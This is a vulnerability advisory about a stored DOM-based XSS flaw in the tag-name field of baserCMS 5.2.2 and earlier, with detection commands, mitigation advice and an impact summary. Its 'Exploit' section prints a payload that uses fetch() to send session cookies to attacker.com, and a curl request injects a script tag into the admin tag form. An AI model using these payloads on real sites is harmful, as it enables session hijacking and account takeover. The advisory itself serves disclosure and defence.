baserCMS, DOM-based Cross-Site Scripting, JVN_94952030 (High)

Listen to this Post

The vulnerability resides in baserCMS’s tag creation feature, specifically in how user‑supplied tag names are processed before being rendered in the administration panel and public pages. When an authenticated user (typically an admin or content editor) creates a new tag, the application takes the input string and, instead of safely encoding it, injects it directly into the DOM via JavaScript‑driven templating or innerHTML assignments. Because the tag name is not properly sanitized on the client side, an attacker can embed arbitrary JavaScript payloads within the tag value—for example, <img src=x onerror=alert(document.cookie)>. The payload is stored in the database and later reflected in the browser without proper output encoding. Upon page load or when the tag list is rendered, the malicious script executes in the context of the victim’s session, leading to DOM‑based XSS. The issue affects baserCMS versions 5.2.2 and earlier. The root cause is the absence of contextual escaping for tag names in the front‑end JavaScript that builds the tag interface. Attack vectors include the tag creation form, tag editing, and any component that displays tags. Because the attack requires no user interaction beyond viewing a page containing the crafted tag, the severity is high. The fix involves updating to version 5.2.3 or later, where the tag rendering logic has been refactored to use safe DOM manipulation methods and proper encoding.

dailycve form:

Platform: baserCMS
Version: 5.2.2 & earlier
Vulnerability : DOM XSS (tag)
Severity: High
date: Mar 31, 2026

Prediction: Patch: April 7

Analytics under What Undercode Say:

bash commands and codes:

Check installed baserCMS version via composer
composer show baserproject/basercms | grep versions
Search for vulnerable tag rendering in theme files
grep -r "innerHTML.tag" ./app/View/
Use curl to test for reflected XSS (authenticated session required)
curl -X POST 'https://example.com/admin/tags/add' \
-H 'Cookie: BASERCMS=session_cookie' \
-d 'name=<script>alert("XSS")</script>'
Quick version detection from config
cat app/Config/install.php | grep version

Exploit:

An attacker with admin or tag‑creation privileges injects a JavaScript payload (e.g., "><img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>) into the tag name field. The payload is stored in the database. When any user (including super‑admins) visits the tag management page or a page where that tag is displayed, the script executes in their browser, potentially stealing session cookies, performing unauthorized actions, or defacing the CMS.

Protection from this CVE

Upgrade to baserCMS version 5.2.3 or later immediately. If an immediate upgrade is not possible, apply the official patch referenced in JVN_94952030. As a temporary workaround, restrict tag creation permissions to only highly trusted users and enable a Content Security Policy (CSP) that disallows inline scripts. Ensure that all user‑supplied data is escaped using the framework’s built‑in h() function and avoid innerHTML for dynamic content.

Impact

Successful exploitation leads to full account compromise of any user viewing the malicious tag. An attacker can hijack admin sessions, modify content, extract sensitive data, and potentially escalate to remote code execution through further administrative features. The confidentiality, integrity, and availability of the baserCMS instance are all severely impacted.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top